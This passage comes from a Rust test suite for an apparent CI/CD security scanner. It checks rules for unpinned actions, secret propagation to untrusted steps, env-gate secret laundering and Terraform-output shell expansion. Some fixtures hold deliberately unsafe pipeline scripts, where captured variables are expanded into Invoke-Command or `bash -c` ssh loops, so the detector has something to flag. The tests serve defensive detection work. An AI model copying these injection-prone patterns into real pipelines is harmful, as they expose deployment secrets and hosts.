9176        assert!(findings.is_empty());
9177    }
9178
9179    // ── unpinned_action severity tiering ─────────────────────────
9180
9181    #[test]
9182    fn unpinned_action_well_known_first_party_is_medium() {
9183        // `actions/checkout@v4` — owner is the GitHub-maintained `actions`
9184        // org. The supply-chain surface is real but operationally narrow,
9185        // so the rule emits Medium rather than the default High.
9186        let mut g = AuthorityGraph::new(source("ci.yml"));
9187        g.add_node(NodeKind::Image, "actions/checkout@v4", TrustZone::Untrusted);
9188
9189        let findings = unpinned_action(&g);
9190        assert_eq!(findings.len(), 1);
9191        assert_eq!(findings[0].severity, Severity::Medium);
9192        assert_eq!(findings[0].category, FindingCategory::UnpinnedAction);
9193    }
9194
9195    #[test]
9196    fn unpinned_action_same_repo_composite_is_info() {
9197        // `./.github/actions/setup` — same-repo composite action. No
9198        // external supply-chain surface, so the rule emits Info as a
9199        // hygiene-only signal rather than a security finding.
9200        let mut g = AuthorityGraph::new(source("ci.yml"));
9201        g.add_node(
9202            NodeKind::Image,
9203            "./.github/actions/setup",
9204            TrustZone::FirstParty,
9205        );
9206
9207        let findings = unpinned_action(&g);
9208        assert_eq!(findings.len(), 1);
9209        assert_eq!(findings[0].severity, Severity::Info);
9210        assert_eq!(findings[0].category, FindingCategory::UnpinnedAction);
9211    }
9212
9213    #[test]
9214    fn unpinned_action_unknown_owner_is_high() {
9215        // `random-org/foo@v1` — unknown owner, full unbounded supply-chain
9216        // surface. This is the case the rule was originally designed for
9217        // and the only severity tier that still emits at High.
9218        let mut g = AuthorityGraph::new(source("ci.yml"));
9219        g.add_node(NodeKind::Image, "random-org/foo@v1", TrustZone::Untrusted);
9220
9221        let findings = unpinned_action(&g);
9222        assert_eq!(findings.len(), 1);
9223        assert_eq!(findings[0].severity, Severity::High);
9224        assert_eq!(findings[0].category, FindingCategory::UnpinnedAction);
9225    }
9226
9227    #[test]
9228    fn unpinned_action_self_hosted_runner_label_not_flagged() {
9229        // Self-hosted runner labels are FirstParty Image nodes too — but
9230        // they aren't action references and have no @version to pin. The
9231        // rule must skip them (META_SELF_HOSTED is the marker).
9232        let mut g = AuthorityGraph::new(source("ci.yml"));
9233        let mut meta = std::collections::HashMap::new();
9234        meta.insert(META_SELF_HOSTED.into(), "true".into());
9235        g.add_node_with_metadata(NodeKind::Image, "self-hosted", TrustZone::FirstParty, meta);
9236
9237        let findings = unpinned_action(&g);
9238        assert!(
9239            findings.is_empty(),
9240            "self-hosted runner labels must not be flagged as unpinned actions: {findings:#?}"
9241        );
9242    }
9243
9244    // ── authority_propagation clustering ─────────────────────────
9245
9246    #[test]
9247    fn authority_propagation_clusters_one_secret_to_three_sinks() {
9248        // One secret, three different untrusted sinks reached via separate
9249        // propagation paths. After clustering, the rule must emit ONE
9250        // finding listing all three sinks in `nodes_involved`.
9251        let mut g = AuthorityGraph::new(source("ci.yml"));
9252        let secret = g.add_node(NodeKind::Secret, "GITHUB_TOKEN", TrustZone::FirstParty);
9253        let trampoline = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
9254        let sink_a = g.add_node(NodeKind::Step, "deploy[0]", TrustZone::Untrusted);
9255        let sink_b = g.add_node(NodeKind::Step, "deploy[1]", TrustZone::Untrusted);
9256        let sink_c = g.add_node(NodeKind::Step, "deploy[2]", TrustZone::Untrusted);
9257        g.add_edge(trampoline, secret, EdgeKind::HasAccessTo);
9258        g.add_edge(trampoline, sink_a, EdgeKind::DelegatesTo);
9259        g.add_edge(trampoline, sink_b, EdgeKind::DelegatesTo);
9260        g.add_edge(trampoline, sink_c, EdgeKind::DelegatesTo);
9261
9262        let findings = authority_propagation(&g, 4);
9263        assert_eq!(
9264            findings.len(),
9265            1,
9266            "three propagation paths from one secret must collapse to one finding, got: {findings:#?}"
9267        );
9268        let f = &findings[0];
9269        assert_eq!(f.category, FindingCategory::AuthorityPropagation);
9270        assert_eq!(f.severity, Severity::Critical);
9271        // [source, sink_a, sink_b, sink_c] — order preserved by insertion.
9272        assert_eq!(f.nodes_involved.len(), 4);
9273        assert_eq!(f.nodes_involved[0], secret);
9274        assert!(f.nodes_involved.contains(&sink_a));
9275        assert!(f.nodes_involved.contains(&sink_b));
9276        assert!(f.nodes_involved.contains(&sink_c));
9277        assert!(
9278            f.message.contains("3 sinks")
9279                || f.message.contains("deploy[0]") && f.message.contains("deploy[2]"),
9280            "cluster message must mention the multiple sinks: {}",
9281            f.message
9282        );
9283    }
9284
9285    #[test]
9286    fn authority_propagation_does_not_cluster_separate_secrets() {
9287        // Three independent secrets, each reaching one sink. The clustering
9288        // is keyed on the source node, so each secret's path becomes its own
9289        // finding — three findings total, not one.
9290        let mut g = AuthorityGraph::new(source("ci.yml"));
9291        let s1 = g.add_node(NodeKind::Secret, "TOKEN_A", TrustZone::FirstParty);
9292        let s2 = g.add_node(NodeKind::Secret, "TOKEN_B", TrustZone::FirstParty);
9293        let s3 = g.add_node(NodeKind::Secret, "TOKEN_C", TrustZone::FirstParty);
9294        let step1 = g.add_node(NodeKind::Step, "step_a", TrustZone::FirstParty);
9295        let step2 = g.add_node(NodeKind::Step, "step_b", TrustZone::FirstParty);
9296        let step3 = g.add_node(NodeKind::Step, "step_c", TrustZone::FirstParty);
9297        let sink1 = g.add_node(NodeKind::Step, "sink_a", TrustZone::Untrusted);
9298        let sink2 = g.add_node(NodeKind::Step, "sink_b", TrustZone::Untrusted);
9299        let sink3 = g.add_node(NodeKind::Step, "sink_c", TrustZone::Untrusted);
9300        g.add_edge(step1, s1, EdgeKind::HasAccessTo);
9301        g.add_edge(step1, sink1, EdgeKind::DelegatesTo);
9302        g.add_edge(step2, s2, EdgeKind::HasAccessTo);
9303        g.add_edge(step2, sink2, EdgeKind::DelegatesTo);
9304        g.add_edge(step3, s3, EdgeKind::HasAccessTo);
9305        g.add_edge(step3, sink3, EdgeKind::DelegatesTo);
9306
9307        let findings = authority_propagation(&g, 4);
9308        assert_eq!(
9309            findings.len(),
9310            3,
9311            "one finding per distinct source secret, got: {findings:#?}"
9312        );
9313        let sources: std::collections::HashSet<_> =
9314            findings.iter().map(|f| f.nodes_involved[0]).collect();
9315        assert!(sources.contains(&s1));
9316        assert!(sources.contains(&s2));
9317        assert!(sources.contains(&s3));
9318    }
9319
9320    // ── secret_via_env_gate_to_untrusted_consumer ──────────────────────
9321
9322    /// Build a graph with one job containing a configurable sequence of
9323    /// steps. Each tuple is (name, trust_zone, writes_env_gate, reads_env,
9324    /// secret_to_link). Returns the graph plus the assigned NodeIds in
9325    /// declaration order so tests can assert on specific nodes.
9326    fn job_with_steps(
9327        job: &str,
9328        steps: &[(&str, TrustZone, bool, bool, Option<&str>)],
9329    ) -> (AuthorityGraph, Vec<NodeId>) {
9330        let mut g = AuthorityGraph::new(source("ci.yml"));
9331        let mut secret_ids: std::collections::HashMap<String, NodeId> =
9332            std::collections::HashMap::new();
9333        let mut step_ids = Vec::new();
9334        for (name, zone, writes, reads, secret) in steps {
9335            let mut meta = std::collections::HashMap::new();
9336            meta.insert(META_JOB_NAME.into(), job.into());
9337            if *writes {
9338                meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
9339            }
9340            if *reads {
9341                meta.insert(META_READS_ENV.into(), "true".into());
9342            }
9343            let id = g.add_node_with_metadata(NodeKind::Step, *name, *zone, meta);
9344            if let Some(sname) = secret {
9345                let secret_id = *secret_ids
9346                    .entry((*sname).to_string())
9347                    .or_insert_with(|| g.add_node(NodeKind::Secret, *sname, TrustZone::FirstParty));
9348                g.add_edge(id, secret_id, EdgeKind::HasAccessTo);
9349            }
9350            step_ids.push(id);
9351        }
9352        (g, step_ids)
9353    }
9354
9355    #[test]
9356    fn env_gate_writer_then_untrusted_reader_fires() {
9357        let (g, _ids) = job_with_steps(
9358            "build",
9359            &[
9360                (
9361                    "setup",
9362                    TrustZone::FirstParty,
9363                    true,
9364                    false,
9365                    Some("CLOUD_KEY"),
9366                ),
9367                ("deploy", TrustZone::Untrusted, false, true, None),
9368            ],
9369        );
9370        let findings = secret_via_env_gate_to_untrusted_consumer(&g);
9371        assert_eq!(findings.len(), 1, "writer + untrusted reader must fire");
9372        assert_eq!(findings[0].severity, Severity::Critical);
9373        assert!(
9374            findings[0].message.contains("CLOUD_KEY"),
9375            "message must name the laundered secret"
9376        );
9377        assert!(
9378            findings[0].message.contains("deploy"),
9379            "message must name the consumer step"
9380        );
9381    }
9382
9383    #[test]
9384    fn env_gate_writer_then_first_party_reader_does_not_fire() {
9385        // First-party consumer is the legitimate use of $GITHUB_ENV — the
9386        // entire point of the gate. Only flagged when the consumer's trust
9387        // zone is reduced.
9388        let (g, _) = job_with_steps(
9389            "build",
9390            &[
9391                (
9392                    "setup",
9393                    TrustZone::FirstParty,
9394                    true,
9395                    false,
9396                    Some("CLOUD_KEY"),
9397                ),
9398                ("use-it", TrustZone::FirstParty, false, true, None),
9399            ],
9400        );
9401        let findings = secret_via_env_gate_to_untrusted_consumer(&g);
9402        assert!(
9403            findings.is_empty(),
9404            "first-party reader is the intended use; must not fire"
9405        );
9406    }
9407
9408    #[test]
9409    fn env_gate_write_of_non_secret_value_does_not_fire() {
9410        // Writer step doesn't hold any Secret/Identity — it's writing a
9411        // benign value (build version, config flag) into the env. Out of
9412        // scope: the env gate isn't laundering authority across a trust
9413        // boundary because there's no authority to launder.
9414        let (g, _) = job_with_steps(
9415            "build",
9416            &[
9417                ("setup", TrustZone::FirstParty, true, false, None),
9418                ("deploy", TrustZone::Untrusted, false, true, None),
9419            ],
9420        );
9421        let findings = secret_via_env_gate_to_untrusted_consumer(&g);
9422        assert!(
9423            findings.is_empty(),
9424            "env-gate write of non-authority value must not fire"
9425        );
9426    }
9427
9428    #[test]
9429    fn writer_in_different_job_does_not_fire() {
9430        // The env gate only propagates within a job — a writer in job A
9431        // cannot reach a consumer in job B even if both jobs run on the
9432        // same runner. Same-job constraint enforced via META_JOB_NAME.
9433        let mut g = AuthorityGraph::new(source("ci.yml"));
9434        let secret = g.add_node(NodeKind::Secret, "CLOUD_KEY", TrustZone::FirstParty);
9435
9436        let mut writer_meta = std::collections::HashMap::new();
9437        writer_meta.insert(META_JOB_NAME.into(), "build".into());
9438        writer_meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
9439        let writer =
9440            g.add_node_with_metadata(NodeKind::Step, "setup", TrustZone::FirstParty, writer_meta);
9441        g.add_edge(writer, secret, EdgeKind::HasAccessTo);
9442
9443        let mut consumer_meta = std::collections::HashMap::new();
9444        consumer_meta.insert(META_JOB_NAME.into(), "deploy".into()); // DIFFERENT job
9445        consumer_meta.insert(META_READS_ENV.into(), "true".into());
9446        g.add_node_with_metadata(
9447            NodeKind::Step,
9448            "remote-deploy",
9449            TrustZone::Untrusted,
9450            consumer_meta,
9451        );
9452
9453        let findings = secret_via_env_gate_to_untrusted_consumer(&g);
9454        assert!(
9455            findings.is_empty(),
9456            "cross-job writer/consumer pair must not fire — same-job constraint"
9457        );
9458    }
9459
9460    #[test]
9461    fn writer_after_consumer_in_same_job_does_not_fire() {
9462        // Declaration order matters: a writer that comes AFTER the
9463        // consumer can't have populated the env the consumer read. Without
9464        // this ordering check the rule would over-fire on any same-job
9465        // write/read pair.
9466        let (g, _) = job_with_steps(
9467            "build",
9468            &[
9469                ("deploy", TrustZone::Untrusted, false, true, None),
9470                (
9471                    "setup",
9472                    TrustZone::FirstParty,
9473                    true,
9474                    false,
9475                    Some("CLOUD_KEY"),
9476                ),
9477            ],
9478        );
9479        let findings = secret_via_env_gate_to_untrusted_consumer(&g);
9480        assert!(
9481            findings.is_empty(),
9482            "writer that runs after the consumer cannot launder into it"
9483        );
9484    }
9485
9486    #[test]
9487    fn third_party_consumer_also_fires() {
9488        // ThirdParty (SHA-pinned marketplace action) is still in scope —
9489        // the action's code is immutable but it can still receive and
9490        // exfiltrate the laundered secret.
9491        let (g, _) = job_with_steps(
9492            "build",
9493            &[
9494                (
9495                    "setup",
9496                    TrustZone::FirstParty,
9497                    true,
9498                    false,
9499                    Some("CLOUD_KEY"),
9500                ),
9501                (
9502                    "third-party-deploy",
9503                    TrustZone::ThirdParty,
9504                    false,
9505                    true,
9506                    None,
9507                ),
9508            ],
9509        );
9510        let findings = secret_via_env_gate_to_untrusted_consumer(&g);
9511        assert_eq!(findings.len(), 1);
9512    }
9513
9514    #[test]
9515    fn rule_appears_in_run_all_rules() {
9516        // run_all_rules wires every rule in the catalogue — assert the
9517        // new one is hooked up so it actually fires from the CLI scan path.
9518        let (g, _) = job_with_steps(
9519            "build",
9520            &[
9521                (
9522                    "setup",
9523                    TrustZone::FirstParty,
9524                    true,
9525                    false,
9526                    Some("CLOUD_KEY"),
9527                ),
9528                ("deploy", TrustZone::Untrusted, false, true, None),
9529            ],
9530        );
9531        let findings = run_all_rules(&g, 4);
9532        assert!(
9533            findings
9534                .iter()
9535                .any(|f| f.category == FindingCategory::SecretViaEnvGateToUntrustedConsumer),
9536            "secret_via_env_gate_to_untrusted_consumer must run via run_all_rules"
9537        );
9538    }
9539
9540    // ── no_workflow_level_permissions_block ──────────────────
9541
9542    fn graph_with_platform(platform: &str, file: &str) -> AuthorityGraph {
9543        let mut g = AuthorityGraph::new(source(file));
9544        g.metadata.insert(META_PLATFORM.into(), platform.into());
9545        g
9546    }
9547
9548    #[test]
9549    fn no_workflow_perms_fires_on_gha_when_marker_present_and_no_token_identity() {
9550        let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
9551        g.metadata
9552            .insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
9553        // A real workflow always has at least one Step. The empty-graph
9554        // guard inside the rule excludes mis-classified variable-only YAML.
9555        g.add_node(NodeKind::Step, "build[0]", TrustZone::FirstParty);
9556        // No GITHUB_TOKEN identity nodes at all (parser would skip creating
9557        // them when there's no permissions block anywhere).
9558
9559        let findings = no_workflow_level_permissions_block(&g);
9560        assert_eq!(findings.len(), 1);
9561        assert_eq!(findings[0].severity, Severity::Medium);
9562        assert_eq!(
9563            findings[0].category,
9564            FindingCategory::NoWorkflowLevelPermissionsBlock
9565        );
9566    }
9567
9568    #[test]
9569    fn no_workflow_perms_does_not_fire_on_empty_graph() {
9570        // Empty graph (variable-only YAML mis-detected as GHA, parse
9571        // failure, etc.) has no real authority surface — must skip.
9572        let mut g = graph_with_platform("github-actions", "vars.yml");
9573        g.metadata
9574            .insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
9575        assert!(no_workflow_level_permissions_block(&g).is_empty());
9576    }
9577
9578    #[test]
9579    fn no_workflow_perms_does_not_fire_when_a_job_declares_permissions() {
9580        // Workflow has no top-level permissions, but one job does — the rule
9581        // must not fire because the per-job override is what runs.
9582        let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
9583        g.metadata
9584            .insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
9585        let mut meta = std::collections::HashMap::new();
9586        meta.insert(META_PERMISSIONS.into(), "{ contents: read }".into());
9587        meta.insert(META_IDENTITY_SCOPE.into(), "constrained".into());
9588        g.add_node_with_metadata(
9589            NodeKind::Identity,
9590            "GITHUB_TOKEN (build)",
9591            TrustZone::FirstParty,
9592            meta,
9593        );
9594
9595        let findings = no_workflow_level_permissions_block(&g);
9596        assert!(findings.is_empty());
9597    }
9598
9599    #[test]
9600    fn no_workflow_perms_does_not_fire_on_ado_or_gitlab() {
9601        let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
9602        g.metadata
9603            .insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
9604        assert!(no_workflow_level_permissions_block(&g).is_empty());
9605
9606        let mut g = graph_with_platform("gitlab", ".gitlab-ci.yml");
9607        g.metadata
9608            .insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
9609        assert!(no_workflow_level_permissions_block(&g).is_empty());
9610    }
9611
9612    // ── prod_deploy_job_no_environment_gate ───────────────────
9613
9614    #[test]
9615    fn prod_deploy_no_env_gate_fires_on_ado_prod_sc_without_env_marker() {
9616        let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
9617        step_with_meta(
9618            &mut g,
9619            "AzureCLI : Deploy",
9620            &[(META_SERVICE_CONNECTION_NAME, "platform-prod-sc")],
9621        );
9622        let findings = prod_deploy_job_no_environment_gate(&g);
9623        assert_eq!(findings.len(), 1);
9624        assert_eq!(findings[0].severity, Severity::High);
9625        assert_eq!(
9626            findings[0].category,
9627            FindingCategory::ProdDeployJobNoEnvironmentGate
9628        );
9629        assert!(findings[0].message.contains("platform-prod-sc"));
9630    }
9631
9632    #[test]
9633    fn prod_deploy_no_env_gate_skips_when_env_marker_present() {
9634        let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
9635        step_with_meta(
9636            &mut g,
9637            "AzureCLI : Deploy",
9638            &[
9639                (META_SERVICE_CONNECTION_NAME, "platform-prod-sc"),
9640                (META_ENV_APPROVAL, "true"),
9641            ],
9642        );
9643        assert!(prod_deploy_job_no_environment_gate(&g).is_empty());
9644    }
9645
9646    #[test]
9647    fn prod_deploy_no_env_gate_skips_dev_connection() {
9648        let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
9649        step_with_meta(
9650            &mut g,
9651            "AzureCLI : Deploy",
9652            &[(META_SERVICE_CONNECTION_NAME, "platform-dev-sc")],
9653        );
9654        assert!(prod_deploy_job_no_environment_gate(&g).is_empty());
9655    }
9656
9657    #[test]
9658    fn prod_deploy_no_env_gate_via_edge_to_prod_identity() {
9659        let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
9660        let step = step_with_meta(&mut g, "AzureCLI : Deploy", &[]);
9661        let mut id_meta = std::collections::HashMap::new();
9662        id_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
9663        let conn = g.add_node_with_metadata(
9664            NodeKind::Identity,
9665            "alz-infra-sc-prd-uks",
9666            TrustZone::FirstParty,
9667            id_meta,
9668        );
9669        g.add_edge(step, conn, EdgeKind::HasAccessTo);
9670        let findings = prod_deploy_job_no_environment_gate(&g);
9671        assert_eq!(findings.len(), 1);
9672        assert!(findings[0].message.contains("alz-infra-sc-prd-uks"));
9673    }
9674
9675    // ── long_lived_secret_without_oidc_recommendation ─────────
9676
9677    #[test]
9678    fn ll_secret_without_oidc_emits_for_aws_secret_with_no_oidc_in_graph() {
9679        let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
9680        g.add_node(NodeKind::Secret, "AWS_ACCESS_KEY_ID", TrustZone::FirstParty);
9681
9682        let findings = long_lived_secret_without_oidc_recommendation(&g);
9683        assert_eq!(findings.len(), 1);
9684        assert_eq!(findings[0].severity, Severity::Info);
9685        assert!(matches!(
9686            findings[0].recommendation,
9687            Recommendation::FederateIdentity { .. }
9688        ));
9689    }
9690
9691    #[test]
9692    fn ll_secret_without_oidc_skips_when_oidc_identity_present() {
9693        let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
9694        g.add_node(NodeKind::Secret, "AWS_ACCESS_KEY_ID", TrustZone::FirstParty);
9695        let mut meta = std::collections::HashMap::new();
9696        meta.insert(META_OIDC.into(), "true".into());
9697        g.add_node_with_metadata(
9698            NodeKind::Identity,
9699            "AWS/deploy-role",
9700            TrustZone::FirstParty,
9701            meta,
9702        );
9703
9704        assert!(long_lived_secret_without_oidc_recommendation(&g).is_empty());
9705    }
9706
9707    #[test]
9708    fn ll_secret_without_oidc_skips_unrecognised_secret_names() {
9709        let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
9710        g.add_node(NodeKind::Secret, "INTERNAL_KEY", TrustZone::FirstParty);
9711        // Not AWS/GCP/Azure-shaped — no actionable OIDC migration path.
9712        assert!(long_lived_secret_without_oidc_recommendation(&g).is_empty());
9713    }
9714
9715    // ── pull_request_workflow_inconsistent_fork_check ─────────
9716
9717    #[test]
9718    fn inconsistent_fork_check_fires_when_one_job_guarded_one_unguarded() {
9719        let mut g = graph_with_platform("github-actions", ".github/workflows/pr.yml");
9720        g.metadata
9721            .insert(META_TRIGGER.into(), "pull_request".into());
9722        let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
9723        let s_guarded = step_with_meta(
9724            &mut g,
9725            "build[0]",
9726            &[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
9727        );
9728        let s_unguarded = step_with_meta(&mut g, "deploy[0]", &[(META_JOB_NAME, "deploy")]);
9729        g.add_edge(s_guarded, secret, EdgeKind::HasAccessTo);
9730        g.add_edge(s_unguarded, secret, EdgeKind::HasAccessTo);
9731
9732        let findings = pull_request_workflow_inconsistent_fork_check(&g);
9733        assert_eq!(findings.len(), 1);
9734        assert_eq!(
9735            findings[0].category,
9736            FindingCategory::PullRequestWorkflowInconsistentForkCheck
9737        );
9738        assert!(findings[0].message.contains("deploy"));
9739        assert!(findings[0].message.contains("build"));
9740    }
9741
9742    #[test]
9743    fn inconsistent_fork_check_skips_when_all_jobs_guarded() {
9744        let mut g = graph_with_platform("github-actions", ".github/workflows/pr.yml");
9745        g.metadata
9746            .insert(META_TRIGGER.into(), "pull_request".into());
9747        let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
9748        let s1 = step_with_meta(
9749            &mut g,
9750            "build[0]",
9751            &[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
9752        );
9753        let s2 = step_with_meta(
9754            &mut g,
9755            "deploy[0]",
9756            &[(META_JOB_NAME, "deploy"), (META_FORK_CHECK, "true")],
9757        );
9758        g.add_edge(s1, secret, EdgeKind::HasAccessTo);
9759        g.add_edge(s2, secret, EdgeKind::HasAccessTo);
9760        assert!(pull_request_workflow_inconsistent_fork_check(&g).is_empty());
9761    }
9762
9763    #[test]
9764    fn inconsistent_fork_check_skips_when_no_job_guarded() {
9765        // Both unguarded → not "inconsistent" (the org never tried). Other
9766        // rules cover the underlying risk.
9767        let mut g = graph_with_platform("github-actions", ".github/workflows/pr.yml");
9768        g.metadata
9769            .insert(META_TRIGGER.into(), "pull_request".into());
9770        let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
9771        let s1 = step_with_meta(&mut g, "build[0]", &[(META_JOB_NAME, "build")]);
9772        let s2 = step_with_meta(&mut g, "deploy[0]", &[(META_JOB_NAME, "deploy")]);
9773        g.add_edge(s1, secret, EdgeKind::HasAccessTo);
9774        g.add_edge(s2, secret, EdgeKind::HasAccessTo);
9775        assert!(pull_request_workflow_inconsistent_fork_check(&g).is_empty());
9776    }
9777
9778    // ── terraform_output_via_setvariable_shell_expansion ─────
9779
9780    /// Helper: add a Step node tagged with the given job and an inline
9781    /// script body. Returns the node id so the caller can wire it up.
9782    fn add_script_step_in_job(g: &mut AuthorityGraph, name: &str, job: &str, body: &str) -> NodeId {
9783        let mut meta = std::collections::HashMap::new();
9784        meta.insert(META_SCRIPT_BODY.into(), body.into());
9785        meta.insert(META_JOB_NAME.into(), job.into());
9786        g.add_node_with_metadata(NodeKind::Step, name, TrustZone::FirstParty, meta)
9787    }
9788
9789    #[test]
9790    fn tf_output_setvariable_fires_on_solarwinds_corpus_pattern() {
9791        // Faithful reproduction of the
9792        // `Azure_Landing_Zone/sharedservice-solarwinds/.pipeline/deployment.yml`
9793        // pattern (lines ~98-180 of the corpus exemplar): a PowerShell@2
9794        // step reads `$env:TF_OUT_GDSVMS` and emits
9795        // `##vso[task.setvariable variable=gdsvms]`. A later
9796        // AzurePowerShell@5 step does `"$(gdsvms)" -split ","` followed by
9797        // `Invoke-Command` against each VM in the list.
9798        let mut g = AuthorityGraph::new(source("ado.yml"));
9799        add_script_step_in_job(
9800            &mut g,
9801            "capture-tf-outputs",
9802            "Deployment_Apply",
9803            "Write-Host \"TF_OUT_GDSVMS: $env:TF_OUT_GDSVMS\"\n\
9804             Write-Host \"##vso[task.setvariable variable=gdsvms]$env:TF_OUT_GDSVMS\"\n\
9805             Write-Host \"##vso[task.setvariable variable=amlinvms]$env:TF_OUT_AMLINVMS\"",
9806        );
9807        add_script_step_in_job(
9808            &mut g,
9809            "join-vms-to-domain",
9810            "Deployment_Apply",
9811            "$GDSvmNames = \"$(gdsvms)\" -split \",\"\n\
9812             foreach ($vmName in $GDSvmNames) {\n\
9813               Invoke-Command -ComputerName $vmName -ScriptBlock { Add-Computer }\n\
9814             }",
9815        );
9816
9817        let findings = terraform_output_via_setvariable_shell_expansion(&g);
9818        // Two captured variables (gdsvms, amlinvms) but only `gdsvms` is
9819        // referenced in the sink — exactly one finding.
9820        assert_eq!(findings.len(), 1, "got: {findings:#?}");
9821        assert_eq!(findings[0].severity, Severity::High);
9822        assert_eq!(
9823            findings[0].category,
9824            FindingCategory::TerraformOutputViaSetvariableShellExpansion
9825        );
9826        assert!(findings[0].message.contains("gdsvms"));
9827        assert!(findings[0].nodes_involved.len() == 2);
9828    }
9829
9830    #[test]
9831    fn tf_output_setvariable_fires_on_literal_terraform_output_cli() {
9832        // Variant: the capture step actually shells out to
9833        // `terraform output -raw vm_names` instead of going through the
9834        // `TF_OUT_*` env-var convention. Sink uses bash -c "$(NAME)".
9835        let mut g = AuthorityGraph::new(source("ado.yml"));
9836        add_script_step_in_job(
9837            &mut g,
9838            "tf-capture",
9839            "deploy",
9840            "VMS=$(terraform output -raw vm_names)\n\
9841             echo \"##vso[task.setvariable variable=vms;]$VMS\"",
9842        );
9843        add_script_step_in_job(
9844            &mut g,
9845            "tf-consume",
9846            "deploy",
9847            "bash -c \"for vm in $(vms); do ssh $vm uptime; done\"",
9848        );
9849
9850        let findings = terraform_output_via_setvariable_shell_expansion(&g);
9851        assert_eq!(findings.len(), 1, "got: {findings:#?}");
9852        assert!(findings[0].message.contains("vms"));
9853    }
9854
9855    #[test]
9856    fn tf_output_setvariable_skips_when_only_phase_one_present() {
9857        // Capture step exists, but no later step in the same job ever
9858        // references the captured variable in shell-expansion position.
9859        let mut g = AuthorityGraph::new(source("ado.yml"));
9860        add_script_step_in_job(
9861            &mut g,
9862            "capture",
9863            "deploy",
9864            "Write-Host \"##vso[task.setvariable variable=gdsvms]$env:TF_OUT_GDSVMS\"",
9865        );
9866        add_script_step_in_job(
9867            &mut g,
9868            "innocuous-print",
9869            "deploy",
9870            "Write-Host 'Deployment complete.'",
9871        );
9872
9873        let findings = terraform_output_via_setvariable_shell_expansion(&g);
9874        assert!(
9875            findings.is_empty(),
9876            "phase-1-only must not fire; got: {findings:#?}"
9877        );
9878    }
9879
9880    #[test]
9881    fn tf_output_setvariable_skips_when_only_phase_two_present() {
9882        // Sink step uses $(gdsvms) in shell-expansion position, but no
9883        // earlier step in the same job ever captured a terraform output
9884        // and emitted a setvariable for that name. Variable might be
9885        // defined elsewhere (variable group, vars yaml) — out of scope.
9886        let mut g = AuthorityGraph::new(source("ado.yml"));
9887        add_script_step_in_job(&mut g, "noop-first", "deploy", "echo 'starting deploy'");
9888        add_script_step_in_job(
9889            &mut g,
9890            "consume-only",
9891            "deploy",
9892            "$names = \"$(gdsvms)\" -split \",\"\n\
9893             foreach ($n in $names) { Invoke-Command -ComputerName $n -ScriptBlock {} }",
9894        );
9895
9896        let findings = terraform_output_via_setvariable_shell_expansion(&g);
9897        assert!(
9898            findings.is_empty(),
9899            "phase-2-only must not fire; got: {findings:#?}"
9900        );
9901    }
9902
9903    #[test]
9904    fn inconsistent_fork_check_skips_non_pr_trigger() {
9905        let mut g = graph_with_platform("github-actions", ".github/workflows/push.yml");
9906        g.metadata.insert(META_TRIGGER.into(), "push".into());
9907        let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
9908        let s1 = step_with_meta(
9909            &mut g,
9910            "build[0]",
9911            &[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
9912        );
9913        let s2 = step_with_meta(&mut g, "deploy[0]", &[(META_JOB_NAME, "deploy")]);
9914        g.add_edge(s1, secret, EdgeKind::HasAccessTo);
9915        g.add_edge(s2, secret, EdgeKind::HasAccessTo);
9916        assert!(pull_request_workflow_inconsistent_fork_check(&g).is_empty());
9917    }
9918
9919    // ── gitlab_deploy_job_missing_protected_branch_only ────────
9920
9921    #[test]
9922    fn gitlab_deploy_no_protected_only_fires_on_prod_env_without_marker() {
9923        let mut g = graph_with_platform("gitlab", ".gitlab-ci.yml");
9924        step_with_meta(&mut g, "deploy-prod", &[("environment_name", "production")]);
9925        let findings = gitlab_deploy_job_missing_protected_branch_only(&g);
9926        assert_eq!(findings.len(), 1);
9927        assert_eq!(findings[0].severity, Severity::Medium);
9928        assert_eq!(
9929            findings[0].category,
9930            FindingCategory::GitlabDeployJobMissingProtectedBranchOnly
9931        );
9932    }
9933
9934    #[test]
9935    fn gitlab_deploy_no_protected_only_skips_when_marker_present() {
9936        let mut g = graph_with_platform("gitlab", ".gitlab-ci.yml");
9937        step_with_meta(
9938            &mut g,
9939            "deploy-prod",
9940            &[
9941                ("environment_name", "production"),
9942                (META_RULES_PROTECTED_ONLY, "true"),
9943            ],
9944        );
9945        assert!(gitlab_deploy_job_missing_protected_branch_only(&g).is_empty());
9946    }
9947
9948    #[test]
9949    fn gitlab_deploy_no_protected_only_skips_dev_environment() {
9950        let mut g = graph_with_platform("gitlab", ".gitlab-ci.yml");
9951        step_with_meta(&mut g, "deploy-staging", &[("environment_name", "staging")]);
9952        assert!(gitlab_deploy_job_missing_protected_branch_only(&g).is_empty());
9953    }
9954
9955    // ── compensating-control suppressions ─────────────────────
9956
9957    #[test]
9958    fn suppression_checkout_pr_downgraded_when_no_privileged_steps_in_job() {
9959        // Build a graph where checkout_self_pr_exposure would fire BUT the
9960        // job has no secret access and no env-gate writes.
9961        let mut g = graph_with_platform("github-actions", ".github/workflows/lint.yml");
9962        g.metadata
9963            .insert(META_TRIGGER.into(), "pull_request_target".into());
9964        let _checkout = step_with_meta(
